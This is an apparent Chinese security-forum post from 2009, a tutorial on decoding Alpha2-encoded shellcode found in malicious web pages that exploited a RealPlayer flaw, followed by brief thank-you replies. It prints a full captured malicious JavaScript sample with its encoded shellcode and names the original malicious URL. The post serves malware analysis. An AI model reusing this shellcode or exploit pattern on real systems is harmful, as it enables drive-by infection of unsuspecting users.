官方bilibiliWindows破解入门Android逆向入门
【网络诊断修复工具】切换到窄版

吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

吾爱破解 - 52pojie.cn»网站 【 病毒分析 】 『病毒分析区』 网马解密大讲堂——网马解密中级篇004(Alpha2篇)
返回列表 发新帖
查看: 9421|回复: 5
收起左侧

[转载] 网马解密大讲堂——网马解密中级篇004(Alpha2篇)

   关闭 [复制链接]
roxiel
roxiel 发表于 2009-8-20 11:10
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 roxiel 于 2009-8-20 11:12 编辑

by kongzi

Alpha2是Realplay漏洞多采用此加密方式,该加密方式特征:

代码开头:TYIIIIIIIIIIIIIIII

一般情况下在网马解密过程中,在获取的恶意网址源代码中,代码开头有上述类似代码,使用得加密方式即为alpha2。


下面我们将结合实例讲解alpha2解密方法,我们先来看一个典型的alpha2加密的网马代码:
var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\testSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
ShellCode="";
ShellCode=ShellCode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI";
ShellCode=ShellCode+"xkR0qJPJP3YY0fNYwLEQk0p47zpf"+"KRKJJKVe9xJKYoIoYolOoCQv";
ShellCode=ShellCode+"3VsVwLuRKwRva"+"vbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB";
ShellCode=ShellCode+"sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO";
ShellCode=ShellCode+"NuKpTRr"+"NWOVYM5m"+"qqrwSMTn"+"oeoty08JM"+"nKJMgPw2p"+"ey5MgMWQuMw";
ShellCode=ShellCode+"runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX";
ShellCode=ShellCode+"HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK";
ShellCode=ShellCode+"e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI";
ShellCode=ShellCode+"5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ";
ShellCode=ShellCode+"OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL";
ShellCode=ShellCode+"gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5";
ShellCode=ShellCode+"PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN";
ShellCode=ShellCode+"eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw";
ShellCode=ShellCode+"2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW";
ShellCode=ShellCode+"qvRHptd4RPFZVOdoSXQqrORXQy0a6QP86NPcbOpmTo1hsYu14oPfFUTnU3PspsOpgp";

我们将上述代码,复制粘贴至freshow的上操作区域,相见下列截图:
alpha2111.jpg
http://www.baidu163sinasohu.cn/sina/real.js这个恶意网址源代码内容为上述代码,
由于恶意网址的时效性,这个恶意网址已经失效,我将此js脚本源代码已保存,直接使用源代码来讲解,并不影响我们的讲解。

接下来我们要将此代码处理一下,去掉没有用的部分。相见下列截图:
alpha2222.jpg
大的红色框里内容为处理后源代码,实际就是将shellcode部分保留,删除其余无效代码内容。

接下来我们选择解密选项为alpha2,点击decode进行一次解密,解密后内容会显示在下操作区域,
点击up按钮将下操作区域代码上翻至上操作区域,进行二次解密,解密选项选择esc,点击decode进行二次解密,获得网马下载地址,请见下列截图:
alpha2333.jpg

alpha2444.jpg

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复

举报

frozenrain
frozenrain 发表于 2009-9-3 11:30
跟着美女学习网页挂马
【吾爱破解论坛总版规】 - [让你充分了解吾爱破解论坛行为规则]
回复 支持

举报

lidayue
lidayue 发表于 2010-5-11 14:34
吾爱破解论坛没有任何官方QQ群,禁止留联系方式,禁止任何商业交易。
感谢教授教程..谢谢分享
如何升级?如何获得积分?积分对应解释说明!
回复 支持

举报

royzua
royzua 发表于 2010-10-27 00:56
《站点帮助文档》有什么问题来这里看看吧,这里有你想知道的内容!
感谢网友们的无私奉献....相信论坛明天会更好。。学习ing
呼吁大家发布原创作品添加吾爱破解论坛标识!
回复 支持

举报

farmem
farmem 发表于 2011-1-11 22:15
支持  感谢
如何快速判断一个文件是否为病毒!
回复 支持

举报

孽小帅才
孽小帅才 发表于 2011-10-26 18:39
支持。。学习。谢谢分享!!!
回复 支持

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 14:19

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表